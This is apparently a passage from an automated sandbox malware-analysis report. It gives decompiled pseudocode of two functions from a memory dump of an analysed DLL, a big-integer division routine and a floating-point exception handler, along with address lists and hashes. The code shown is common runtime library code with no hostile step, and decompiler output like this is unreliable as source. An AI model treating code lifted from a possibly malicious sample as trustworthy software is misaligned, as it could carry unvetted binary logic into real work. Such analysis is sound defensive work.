				signed int _t298;
				signed int _t299;
				intOrPtr* _t300;
				signed int _t305;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t314;
				void* _t315;
				signed int _t316;
				signed int* _t323;
				signed int* _t325;
				signed int _t329;
				signed int _t331;
				signed int _t332;
				signed int _t334;
				void* _t335;
				signed int _t340;
				signed int _t345;
				intOrPtr* _t347;
				signed int* _t348;

				_t179 = _a4;
				_t329 =  *_t179;
				if(_t329 == 0) {
					L76:
					__eflags = 0;
					return 0;
				} else {
					_t237 = _a8;
					_t310 =  *_t237;
					_v72 = _t310;
					if(_t310 == 0) {
						goto L76;
					} else {
						_t4 = _t329 - 1; // 0x1cb
						_t252 = _t4;
						_v8 = _t252;
						_t311 = _t310 + 0xffffffff;
						if(_t311 != 0) {
							__eflags = _t311 - _t252;
							if(_t311 > _t252) {
								goto L76;
							} else {
								_t181 = _t252;
								_t284 = _t252 - _t311;
								__eflags = _t252 - _t284;
								if(_t252 < _t284) {
									L19:
									_t284 = _t284 + 1;
									__eflags = _t284;
								} else {
									_t345 =  &(_a4[1]);
									__eflags = _t345;
									_t272 = _t345 + _t252 * 4;
									_t46 = _t237 + 4; // 0x6da9df36
									_t347 = _t46 + _t311 * 4;
									while(1) {
										__eflags =  *_t347 -  *_t272;
										if(__eflags != 0) {
											break;
										}
										_t181 = _t181 - 1;
										_t347 = _t347 - 4;
										_t272 = _t272 - 4;
										__eflags = _t181 - _t284;
										if(_t181 >= _t284) {
											continue;
										} else {
											goto L19;
										}
										goto L20;
									}
									if(__eflags < 0) {
										goto L19;
									}
								}
								L20:
								__eflags = _t284;
								if(__eflags == 0) {
									goto L76;
								} else {
									_t182 = _a8;
									_t238 = _v72;
									_t331 =  *(_t182 + _t238 * 4);
									_t54 = _t238 * 4; // 0xffff256e
									_t253 =  *(_t182 + _t54 - 4);
									asm("bsr eax, esi");
									_v44 = _t331;
									_v36 = _t253;
									if(__eflags == 0) {
										_t312 = 0x20;
									} else {
										_t312 = 0x1f - _t182;
									}
									_v12 = _t312;
									_v40 = 0x20 - _t312;
									__eflags = _t312;
									if(_t312 != 0) {
										_t270 = _t312;
										_v36 = _v36 << _t270;
										_v44 = _t331 << _t270 | _t253 >> _v40;
										__eflags = _t238 - 2;
										if(_t238 > 2) {
											_t67 = _t238 * 4; // 0xe850ffff
											_t69 =  &_v36;
											 *_t69 = _v36 |  *(_a8 + _t67 - 8) >> _v40;
											__eflags =  *_t69;
										}
									}
									_t332 = 0;
									_v32 = 0;
									_t285 = _t284 + 0xffffffff;
									__eflags = _t285;
									_v80 = _t285;
									if(_t285 >= 0) {
										_t187 = _a4;
										_t256 = _t285 + _t238;
										_v48 = _t256;
										_v52 = _t187 + (_t285 + 1) * 4;
										_t189 = _t187 + _t256 * 4 + 0xfffffffc;
										__eflags = _t189;
										_v28 = _t189;
										do {
											__eflags = _t256 - _v8;
											if(_t256 > _v8) {
												_t257 = 0;
												__eflags = 0;
											} else {
												_t257 =  *(_t189 + 8);
											}
											_t291 =  *(_t189 + 4);
											_t241 = _t257;
											_t190 =  *_t189;
											_v76 = _t257;
											_v56 = 0;
											_v20 = _t190;
											__eflags = _t312;
											if(_t312 != 0) {
												_t298 = _t241;
												_t212 = E6DAA1ED0(_t291, _v12, _t298);
												_t257 = _v12;
												_t241 = _t298;
												_t291 = _t190 >> _v40 | _t212;
												_t332 = _v20 << _t257;
												__eflags = _v48 - 3;
												_v20 = _t332;
												if(_v48 >= 3) {
													_t257 = _v40;
													_t332 = _t332 |  *(_v28 - 4) >> _t257;
													__eflags = _t332;
													_v20 = _t332;
												}
											}
											_push(_t241);
											_t191 = E6DAA1E30(_t291, _t241, _v44, 0);
											_v56 = _t241;
											_t243 = _t191;
											_t334 = _t332 ^ _t332;
											_t192 = _t291;
											_v24 = _t243;
											_v16 = _t192;
											_t314 = _t257;
											_v68 = _t243;
											_v64 = _t192;
											_v56 = _t334;
											__eflags = _t192;
											if(_t192 != 0) {
												L37:
												_t244 = _t243 + 1;
												asm("adc eax, 0xffffffff");
												_t314 = _t314 + E6DA89C50(_t244, _t192, _v44, 0);
												asm("adc esi, edx");
												_t243 = _t244 | 0xffffffff;
												_t192 = 0;
												__eflags = 0;
												_v56 = _t334;
												_v24 = _t243;
												_v68 = _t243;
												_v16 = 0;
												_v64 = 0;
											} else {
												__eflags = _t243 - 0xffffffff;
												if(_t243 > 0xffffffff) {
													goto L37;
												}
											}
											__eflags = _t334;
											if(__eflags <= 0) {
												if(__eflags < 0) {
													goto L42;
												} else {
													__eflags = _t314 - 0xffffffff;
													if(_t314 <= 0xffffffff) {
														while(1) {
															L42:
															_v24 = _v20;
															_t210 = E6DA89C50(_v36, 0, _t243, _t192);
															__eflags = _t291 - _t314;
															if(__eflags < 0) {
																break;
															}
															if(__eflags > 0) {
																L45:
																_t192 = _v16;
																_t243 = _t243 + 0xffffffff;
																_v68 = _t243;
																asm("adc eax, 0xffffffff");
																_t314 = _t314 + _v44;
																__eflags = _t314;
																_v16 = _t192;
																asm("adc dword [ebp-0x34], 0x0");
																_v64 = _t192;
																if(_t314 == 0) {
																	__eflags = _t314 - 0xffffffff;
																	if(_t314 <= 0xffffffff) {
																		continue;
																	} else {
																	}
																}
															} else {
																__eflags = _t210 - _v24;
																if(_t210 <= _v24) {
																	break;
																} else {
																	goto L45;
																}
															}
															L49:
															_v24 = _t243;
															goto L50;
														}
														_t192 = _v16;
														goto L49;
													}
												}
											}
											L50:
											__eflags = _t192;
											if(_t192 != 0) {
												L52:
												_t258 = _v72;
												_t315 = 0;
												_t335 = 0;
												__eflags = _t258;
												if(_t258 != 0) {
													_t246 = _v52;
													_t201 = _a8 + 4;
													__eflags = _t201;
													_v56 = _t201;
													_v20 = _t258;
													do {
														_v8 =  *_t201;
														_t207 =  *_t246;
														_t264 = _t315 + _v68 * _v8;
														asm("adc esi, edx");
														_t315 = _t335;
														_t335 = 0;
														__eflags = _t207 - _t264;
														if(_t207 < _t264) {
															_t315 = _t315 + 1;
															asm("adc esi, esi");
														}
														 *_t246 = _t207 - _t264;
														_t246 = _t246 + 4;
														_t201 = _v56 + 4;
														_t143 =  &_v20;
														 *_t143 = _v20 - 1;
														__eflags =  *_t143;
														_v56 = _t201;
													} while ( *_t143 != 0);
													_t243 = _v24;
													_t258 = _v72;
												}
												__eflags = 0 - _t335;
												if(__eflags <= 0) {
													if(__eflags < 0) {
														L61:
														__eflags = _t258;
														if(_t258 != 0) {
															_t245 = 0;
															_t294 = _v52;
															_t340 = _a8 + 4;
															__eflags = _t340;
															_t316 = _t258;
															do {
																_t260 =  *_t294;
																_t151 = _t340 + 4; // 0x8d8b5959
																_t340 = _t151;
																_t294 = _t294 + 4;
																asm("adc eax, eax");
																 *((intOrPtr*)(_t294 - 4)) = _t260 +  *((intOrPtr*)(_t340 - 4)) + _t245;
																asm("adc eax, 0x0");
																_t245 = 0;
																_t316 = _t316 - 1;
																__eflags = _t316;
															} while (_t316 != 0);
															_t243 = _v24;
														}
														_t243 = _t243 + 0xffffffff;
														asm("adc dword [ebp-0xc], 0xffffffff");
													} else {
														__eflags = _v76 - _t315;
														if(_v76 < _t315) {
															goto L61;
														}
													}
												}
												_t259 = _v48;
												_v8 = _t259 - 1;
											} else {
												__eflags = _t243;
												if(_t243 == 0) {
													_t259 = _v48;
												} else {
													goto L52;
												}
											}
											_t332 = _v32;
											_t312 = _v12;
											asm("adc esi, 0x0");
											_v32 = 0 + _t243;
											_t293 = _v80 - 1;
											_v52 = _v52 - 4;
											_t256 = _t259 - 1;
											_t189 = _v28 - 4;
											_v80 = _t293;
											_v48 = _t256;
											_v28 = _t189;
											__eflags = _t293;
										} while (_t293 >= 0);
									}
									_t239 = _a4;
									_t255 = _v8 + 1;
									_t185 = _t255;
									__eflags = _t185 -  *_t239;
									if(_t185 <  *_t239) {
										_t288 =  &(( &(_t239[1]))[_t185]);
										do {
											 *_t288 = 0;
											_t288 =  &(_t288[1]);
											_t185 = _t185 + 1;
											__eflags = _t185 -  *_t239;
										} while (_t185 <  *_t239);
									}
									 *_t239 = _t255;
									__eflags = _t255;
									if(_t255 != 0) {
										while(1) {
											__eflags = _t239[_t255];
											if(_t239[_t255] != 0) {
												goto L75;
											}
											_t255 = _t255 + 0xffffffff;
											__eflags = _t255;
											 *_t239 = _t255;
											if(_t255 != 0) {
												continue;
											}
											goto L75;
										}
									}
									L75:
									return _v32;
								}
							}
						} else {
							_t6 = _t237 + 4; // 0xfffff8a4
							_t299 =  *_t6;
							_v8 = _t299;
							if(_t299 != 1) {
								__eflags = _t252;
								if(_t252 != 0) {
									_t247 = 0;
									_v12 = 0;
									_t323 = 0;
									_v28 = 0;
									__eflags = _t252 - 0xffffffff;
									if(_t252 != 0xffffffff) {
										_t276 = _t252 + 1;
										__eflags = _t276;
										_t277 =  &(_t179[_t276]);
										_v32 = _t277;
										do {
											_push(_t247);
											_t227 = E6DAA1E30( *_t277, _t323, _t299, 0);
											_v28 = _t247;
											_t247 = _v12;
											_t323 = _t277;
											_v64 = _t299;
											_v12 = 0 + _t227;
											_t299 = _v8;
											asm("adc ebx, 0x0");
											_t277 = _v32 - 4;
											_v32 = _t277;
											_t329 = _t329 - 1;
											__eflags = _t329;
										} while (_t329 != 0);
										_t179 = _a4;
									}
									_t36 =  &(_t179[1]); // 0x4
									_t348 = _t36;
									 *_t179 = 0;
									_v544 = 0;
									E6DA90928(_t348, 0x1cc,  &_v540, 0);
									_t223 = _v28;
									_t300 = _a4;
									__eflags = 0 - _t223;
									 *_t348 = _t323;
									asm("sbb ecx, ecx");
									 *(_t300 + 8) = _t223;
									__eflags =  ~0x00000000;
									 *_t300 = 0xbadbae;
									return _v12;
								} else {
									_t325 =  &(_t179[1]);
									 *_t179 = _t252;
									_v544 = _t252;
									E6DA90928(_t325, 0x1cc,  &_v540, _t252);
									_t230 = _t179[1];
									_t305 = _t230 % _v8;
									 *_t325 = _t305;
									__eflags = 0 - _t305;
									asm("sbb ecx, ecx");
									__eflags = 0;
									 *_a4 =  ~0x00000000;
									return _t230 / _v8;
								}
							} else {
								 *_t179 = _t311;
								_v544 = _t311;
								E6DA90928( &(_t179[1]), 0x1cc,  &_v540, _t311);
								return _t179[1];
							}
						}
					}
				}
			}
























































































              0x6da904a5
              0x6da904b0
              0x6da904b5
              0x6da9091d
              0x6da90921
              0x6da90927
              0x6da904bb
              0x6da904bb
              0x6da904be
              0x6da904c0
              0x6da904c5
              0x00000000
              0x6da904cb
              0x6da904cb
              0x6da904cb
              0x6da904ce
              0x6da904d1
              0x6da904d4
              0x6da905fb
              0x6da905fd
              0x00000000
              0x6da90603
              0x6da90605
              0x6da90607
              0x6da90609
              0x6da9060b
              0x6da90635
              0x6da90635
              0x6da90635
              0x6da9060d
              0x6da90610
              0x6da90610
              0x6da90613
              0x6da90616
              0x6da90619
              0x6da90620
              0x6da90622
              0x6da90624
              0x00000000
              0x00000000
              0x6da90626
              0x6da90627
              0x6da9062a
              0x6da9062d
              0x6da9062f
              0x00000000
              0x6da90631
              0x00000000
              0x6da90631
              0x00000000
              0x6da9062f
              0x6da90633
              0x00000000
              0x00000000
              0x6da90633
              0x6da90636
              0x6da90636
              0x6da90638
              0x00000000
              0x6da9063e
              0x6da9063e
              0x6da90641
              0x6da90644
              0x6da90647
              0x6da90647
              0x6da9064b
              0x6da9064e
              0x6da90651
              0x6da90654
              0x6da9065f
              0x6da90656
              0x6da9065b
              0x6da9065b
              0x6da90669
              0x6da9066e
              0x6da90671
              0x6da90673
              0x6da9067c
              0x6da9067e
              0x6da90685
              0x6da90688
              0x6da9068b
              0x6da90693
              0x6da90699
              0x6da90699
              0x6da90699
              0x6da90699
              0x6da9068b
              0x6da9069c
              0x6da9069e
              0x6da906a5
              0x6da906a5
              0x6da906a8
              0x6da906ab
              0x6da906b1
              0x6da906b4
              0x6da906b8
              0x6da906c1
              0x6da906c4
              0x6da906c4
              0x6da906c7
              0x6da906d0
              0x6da906d0
              0x6da906d3
              0x6da906da
              0x6da906da
              0x6da906d5
              0x6da906d5
              0x6da906d5
              0x6da906dc
              0x6da906df
              0x6da906e1
              0x6da906e3
              0x6da906e6
              0x6da906ed
              0x6da906f0
              0x6da906f2
              0x6da90700
              0x6da90704
              0x6da90709
              0x6da9070e
              0x6da90715
              0x6da90717
              0x6da90719
              0x6da9071d
              0x6da90720
              0x6da90725
              0x6da9072d
              0x6da9072d
              0x6da9072f
              0x6da9072f
              0x6da90720
              0x6da90732
              0x6da9073a
              0x6da9073f
              0x6da90744
              0x6da90746
              0x6da90748
              0x6da9074a
              0x6da9074d
              0x6da90750
              0x6da90752
              0x6da90755
              0x6da90758
              0x6da9075b
              0x6da9075d
              0x6da90764
              0x6da90769
              0x6da9076c
              0x6da90776
              0x6da90778
              0x6da9077a
              0x6da9077d
              0x6da9077d
              0x6da9077f
              0x6da90782
              0x6da90785
              0x6da90788
              0x6da9078b
              0x6da9075f
              0x6da9075f
              0x6da90762
              0x00000000
              0x00000000
              0x6da90762
              0x6da9078e
              0x6da90790
              0x6da90792
              0x00000000
              0x6da90794
              0x6da90794
              0x6da90797
              0x6da907a0
              0x6da907a0
              0x6da907ae
              0x6da907b1
              0x6da907b6
              0x6da907b8
              0x00000000
              0x00000000
              0x6da907ba
              0x6da907c1
              0x6da907c1
              0x6da907c4
              0x6da907c7
              0x6da907ca
              0x6da907cd
              0x6da907cd
              0x6da907d0
              0x6da907d3
              0x6da907d7
              0x6da907da
              0x6da907dc
              0x6da907df
              0x00000000
              0x00000000
              0x6da907e1
              0x6da907df
              0x6da907bc
              0x6da907bc
              0x6da907bf
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x6da907bf
              0x6da907e6
              0x6da907e6
              0x00000000
              0x6da907e6
              0x6da907e3
              0x00000000
              0x6da907e3
              0x6da90797
              0x6da90792
              0x6da907e9
              0x6da907e9
              0x6da907eb
              0x6da907f5
              0x6da907f5
              0x6da907f8
              0x6da907fa
              0x6da907fc
              0x6da907fe
              0x6da90803
              0x6da90806
              0x6da90806
              0x6da90809
              0x6da9080c
              0x6da90810
              0x6da90812
              0x6da90827
              0x6da90829
              0x6da9082b
              0x6da9082d
              0x6da9082f
              0x6da90831
              0x6da90833
              0x6da90835
              0x6da90838
              0x6da90838
              0x6da9083c
              0x6da9083e
              0x6da90844
              0x6da90847
              0x6da90847
              0x6da90847
              0x6da9084b
              0x6da9084b
              0x6da90850
              0x6da90853
              0x6da90853
              0x6da90858
              0x6da9085a
              0x6da9085c
              0x6da90863
              0x6da90863
              0x6da90865
              0x6da9086a
              0x6da9086c
              0x6da9086f
              0x6da9086f
              0x6da90872
              0x6da90874
              0x6da90874
              0x6da90876
              0x6da90876
              0x6da9087b
              0x6da90881
              0x6da90885
              0x6da90888
              0x6da9088b
              0x6da9088d
              0x6da9088d
              0x6da9088d
              0x6da90892
              0x6da90892
              0x6da90895
              0x6da90898
              0x6da9085e
              0x6da9085e
              0x6da90861
              0x00000000
              0x00000000
              0x6da90861
              0x6da9085c
              0x6da9089c
              0x6da908a2
              0x6da907ed
              0x6da907ed
              0x6da907ef
              0x6da908a7
              0x00000000
              0x00000000
              0x00000000
              0x6da907ef
              0x6da908aa
              0x6da908b4
              0x6da908b7
              0x6da908ba
              0x6da908c0
              0x6da908c1
              0x6da908c5
              0x6da908c6
              0x6da908c9
              0x6da908cc
              0x6da908cf
              0x6da908d2
              0x6da908d2
              0x6da906d0
              0x6da908dd
              0x6da908e0
              0x6da908e1
              0x6da908e3
              0x6da908e5
              0x6da908ea
              0x6da908f0
              0x6da908f0
              0x6da908f6
              0x6da908f9
              0x6da908fa
              0x6da908fa
              0x6da908f0
              0x6da908fe
              0x6da90900
              0x6da90902
              0x6da90904
              0x6da90904
              0x6da90908
              0x00000000
              0x00000000
              0x6da9090a
              0x6da9090a
              0x6da9090d
              0x6da9090f
              0x00000000
              0x00000000
              0x00000000
              0x6da9090f
              0x6da90904
              0x6da90911
              0x6da9091c
              0x6da9091c
              0x6da90638
              0x6da904da
              0x6da904da
              0x6da904da
              0x6da904dd
              0x6da904e3
              0x6da90514
              0x6da90516
              0x6da9055b
              0x6da9055d
              0x6da90564
              0x6da90566
              0x6da90569
              0x6da9056c
              0x6da9056e
              0x6da9056e
              0x6da9056f
              0x6da90572
              0x6da90575
              0x6da90575
              0x6da9057f
              0x6da90584
              0x6da90589
              0x6da9058c
              0x6da90591
              0x6da90598
              0x6da9059b
              0x6da9059e
              0x6da905a1
              0x6da905a4
              0x6da905a7
              0x6da905a7
              0x6da905a7
              0x6da905ac
              0x6da905ac
              0x6da905af
              0x6da905af
              0x6da905b2
              0x6da905c0
              0x6da905d1
              0x6da905d6
              0x6da905dc
              0x6da905e1
              0x6da905e3
              0x6da905e5
              0x6da905e9
              0x6da905ef
              0x6da905f1
              0x6da905fa
              0x6da90518
              0x6da9051b
              0x6da9051f
              0x6da9052e
              0x6da90534
              0x6da90539
              0x6da9053d
              0x6da90548
              0x6da9054a
              0x6da9054c
              0x6da90550
              0x6da90553
              0x6da9055a
              0x6da9055a
              0x6da904e5
              0x6da904eb
              0x6da904fb
              0x6da90501
              0x6da90513
              0x6da90513
              0x6da904e3
              0x6da904d4
              0x6da904c5

              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f079999708376b5f2720b3917fcdf58b9afd395b9802391cf29447260dcc6ee3
              • Instruction ID: bd4214c7983dede3aee10f8fd5e9a8b01e2dcc363d9be1aeb34214455bdd472d
              • Opcode Fuzzy Hash: f079999708376b5f2720b3917fcdf58b9afd395b9802391cf29447260dcc6ee3
              • Instruction Fuzzy Hash: D8F17075E1421A9FDB14CFA9C8806AEB7F1FF88364F158269E919EB380D7309941CF84
              Uniqueness

              Uniqueness Score: -1.00%

              Function 6DA95CF6 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODECrypto
              Download Yara Rule
              C-Code - Quality: 100%
              			E6DA95CF6(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed char _t193;
				signed int _t196;
				signed int _t200;
				signed int _t203;
				void* _t204;
				void* _t207;
				signed int _t210;
				void* _t211;
				signed int _t226;
				unsigned int* _t241;
				signed char _t243;
				signed int* _t251;
				unsigned int* _t257;
				signed int* _t258;
				signed char _t260;
				long _t263;
				signed int* _t266;

				 *(_a4 + 4) = 0;
				_t263 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t243 = _a12;
				if((_t243 & 0x00000010) != 0) {
					_t263 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t243 & 0x00000002) != 0) {
					_t263 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t243 & 0x00000001) != 0) {
					_t263 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t243 & 0x00000004) != 0) {
					_t263 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t243 & 0x00000008) != 0) {
					_t263 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t266 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 +  *_t266) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 3) ^  *(_a4 + 8)) & 0x00000002;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 5) ^  *(_a4 + 8)) & 1;
				_t260 = E6DA9632C(_a4);
				if((_t260 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t260 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t260 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t260 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t260 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t266 & 0x00000c00;
				if(_t172 == 0) {
					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t258 = _a4;
						_t226 =  *_t258 & 0xfffffffd | 1;
						L26:
						 *_t258 = _t226;
						L29:
						_t175 =  *_t266 & 0x00000300;
						if(_t175 == 0) {
							_t251 = _a4;
							_t178 =  *_t251 & 0xffffffeb | 0x00000008;
							L35:
							 *_t251 = _t178;
							L36:
							_t179 = _a4;
							_t255 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t255 = _a4;
								_t241 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t241;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t241 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
								 *(_a4 + 0x50) =  *_t241;
							}
							E6DA96298(_t255);
							RaiseException(_t263, 0, 1,  &_a4);
							_t257 = _a4;
							_t193 = _t257[2];
							if((_t193 & 0x00000010) != 0) {
								 *_t266 =  *_t266 & 0xfffffffe;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000008) != 0) {
								 *_t266 =  *_t266 & 0xfffffffb;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000004) != 0) {
								 *_t266 =  *_t266 & 0xfffffff7;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000002) != 0) {
								 *_t266 =  *_t266 & 0xffffffef;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000001) != 0) {
								 *_t266 =  *_t266 & 0xffffffdf;
							}
							_t196 =  *_t257 & 0x00000003;
							if(_t196 == 0) {
								 *_t266 =  *_t266 & 0xfffff3ff;
							} else {
								_t207 = _t196 - 1;
								if(_t207 == 0) {
									_t210 =  *_t266 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t266 = _t210;
									L58:
									_t200 =  *_t257 >> 0x00000002 & 0x00000007;
									if(_t200 == 0) {
										_t203 =  *_t266 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t266 = _t203;
										L65:
										if(_a28 == 0) {
											 *_t241 = _t257[0x14];
										} else {
											 *_t241 = _t257[0x14];
										}
										return _t203;
									}
									_t204 = _t200 - 1;
									if(_t204 == 0) {
										_t203 =  *_t266 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t203 = _t204 - 1;
									if(_t203 == 0) {
										 *_t266 =  *_t266 & 0xfffff3ff;
									}
									goto L65;
								}
								_t211 = _t207 - 1;
								if(_t211 == 0) {
									_t210 =  *_t266 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t211 == 1) {
									 *_t266 =  *_t266 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t251 = _a4;
							_t178 =  *_t251 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t258 = _a4;
						_t226 =  *_t258 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}
























              0x6da95d04
              0x6da95d0b
              0x6da95d10
              0x6da95d16
              0x6da95d19
              0x6da95d1f
              0x6da95d24
              0x6da95d29
              0x6da95d29
              0x6da95d2f
              0x6da95d34
              0x6da95d39
              0x6da95d39
              0x6da95d40
              0x6da95d45
              0x6da95d4a
              0x6da95d4a
              0x6da95d51
              0x6da95d56
              0x6da95d5b
              0x6da95d5b
              0x6da95d62
              0x6da95d67
              0x6da95d6c
              0x6da95d6c
              0x6da95d74
              0x6da95d84
              0x6da95d96
              0x6da95da8
              0x6da95dbb
              0x6da95dcd
              0x6da95dd5
              0x6da95dda
              0x6da95ddf
              0x6da95ddf
              0x6da95de6
              0x6da95deb
              0x6da95deb
              0x6da95df2
              0x6da95df7
              0x6da95df7
              0x6da95dfe
              0x6da95e03
              0x6da95e03
              0x6da95e0a
              0x6da95e0f
              0x6da95e0f
              0x6da95e19
              0x6da95e1b
              0x6da95e55
              0x6da95e1d
              0x6da95e22
              0x6da95e46
              0x6da95e4e
              0x6da95e42
              0x6da95e42
              0x6da95e58
              0x6da95e5f
              0x6da95e61
              0x6da95e83
              0x6da95e8b
              0x6da95e8e
              0x6da95e8e
              0x6da95e90
              0x6da95e90
              0x6da95e9b
              0x6da95ea1
              0x6da95ea6
              0x6da95ead
              0x6da95ee7
              0x6da95ef2
              0x6da95ef8
              0x6da95efb
              0x6da95efe
              0x6da95f0a
              0x6da95f12
              0x6da95eaf
              0x6da95eb2
              0x6da95ebe
              0x6da95ec4
              0x6da95eca
              0x6da95ecd
              0x6da95ed6
              0x6da95ed6
              0x6da95f15
              0x6da95f23
              0x6da95f29
              0x6da95f2c
              0x6da95f31
              0x6da95f33
              0x6da95f36
              0x6da95f36
              0x6da95f3b
              0x6da95f3d
              0x6da95f40
              0x6da95f40
              0x6da95f45
              0x6da95f47
              0x6da95f4a
              0x6da95f4a
              0x6da95f4f
              0x6da95f51
              0x6da95f54
              0x6da95f54
              0x6da95f59
              0x6da95f5b
              0x6da95f5b
              0x6da95f68
              0x6da95f6b
              0x6da95fa2
              0x6da95f6d
              0x6da95f6d
              0x6da95f70
              0x6da95f9b
              0x6da95f90
              0x6da95f90
              0x6da95fa4
              0x6da95fac
              0x6da95faf
              0x6da95fce
              0x6da95fd3
              0x6da95fd3
              0x6da95fd5
              0x6da95fda
              0x6da95fe6
              0x6da95fdc
              0x6da95fdf
              0x6da95fdf
              0x6da95feb
              0x6da95feb
              0x6da95fb1
              0x6da95fb4
              0x6da95fc3
              0x00000000
              0x6da95fc3
              0x6da95fb6
              0x6da95fb9
              0x6da95fbb
              0x6da95fbb
              0x00000000
              0x6da95fb9
              0x6da95f72
              0x6da95f75
              0x6da95f8b
              0x00000000
              0x6da95f8b
              0x6da95f7a
              0x6da95f7c
              0x6da95f7c
              0x6da95f7a
              0x00000000
              0x6da95f6b
              0x6da95e68
              0x6da95e76
              0x6da95e7e
              0x00000000
              0x6da95e7e
              0x6da95e6c
              0x6da95e71
              0x6da95e71
              0x00000000
              0x6da95e6c
              0x6da95e29
              0x6da95e37
              0x6da95e3f
              0x00000000
              0x6da95e3f
              0x6da95e2d
              0x6da95e32
              0x6da95e32
              0x6da95e2d

              APIs
              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6DA95CF1,?,?,00000008,?,?,6DA9F2FB,00000000), ref: 6DA95F23
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: ExceptionRaise
              • String ID:
              • API String ID: 3997070919-0
